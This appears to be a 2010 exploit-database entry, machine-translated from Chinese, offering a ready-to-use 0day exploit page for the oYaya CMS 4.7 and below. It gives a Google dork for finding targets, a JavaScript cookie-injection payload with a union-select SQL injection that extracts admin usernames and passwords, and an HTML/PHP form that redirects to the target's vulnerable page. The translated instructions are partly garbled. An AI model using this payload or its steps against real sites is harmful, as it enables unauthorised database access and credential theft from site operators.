Concave Yaya 4.7 and below versions through the kill 0day-vulnerability warning-the black bar safety net

2010-05-14T00:00:00
ID MYHACK58:62201026927
Type myhack58
Reporter 佚名
Modified 2010-05-14T00:00:00

Description

EXP:

<! DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gb2312"> <title>-hi.baidu.com/5427518-</title> </head> <style type="text/css"> <!-- . STYLE1 { font-size:13px ; font-family: Arial, Helvetica, sans-serif} --> </style> <span class="STYLE1">concave Yaya 4.7 and below versions through the kill Xday<br><br>for the study, if the user breaches legal consequences<br><br>description:<br> 0. google : inurl:/otype. asp? classid= <br> 1. Type the destination Station, no accident words will you wait a while,because you want to and other script timeout error,is recommended to drink tea.& lt;br> 2. Then the address bar type the following code, The JavaScript hijack it.& lt;br> 3. Refresh once, right click to view source files, the user name and password.& lt;br> 4. If your RP is not good, the flute didn't burst to, clean up cookie play again.& lt;br> 5. If there is no oyaya. asp, the reason is likely to be the target Station version lower than 4. 7, the old version directly cookies injection.& lt;br><br> <font color=red> javascript:alert(document. cookie="n="+escape("2 1 as id,2 as title,admin&password as oStyle,4,5,6,7,8,9 from admin union all select top 1")); </font> <form action="" method="post" enctype="multipart/form-data" class="STYLE1"> <br><br> Ready for you to fill out! Example:www. hackqing. cn<br><br> Target Station:<input type="text" name="a" /> <input type="submit" name="submit" value="submit" /><br><br> Background backup, iis parsing, whatever you use. </form></span> <span class="STYLE1"> <? php if(! empty($_POST['a'])) { header("Location: http://".$ _POST['a']."/ oyaya. asp"); } ?& gt;</span>

The above code is saved as htm or html

!

Note: starting T00ls pking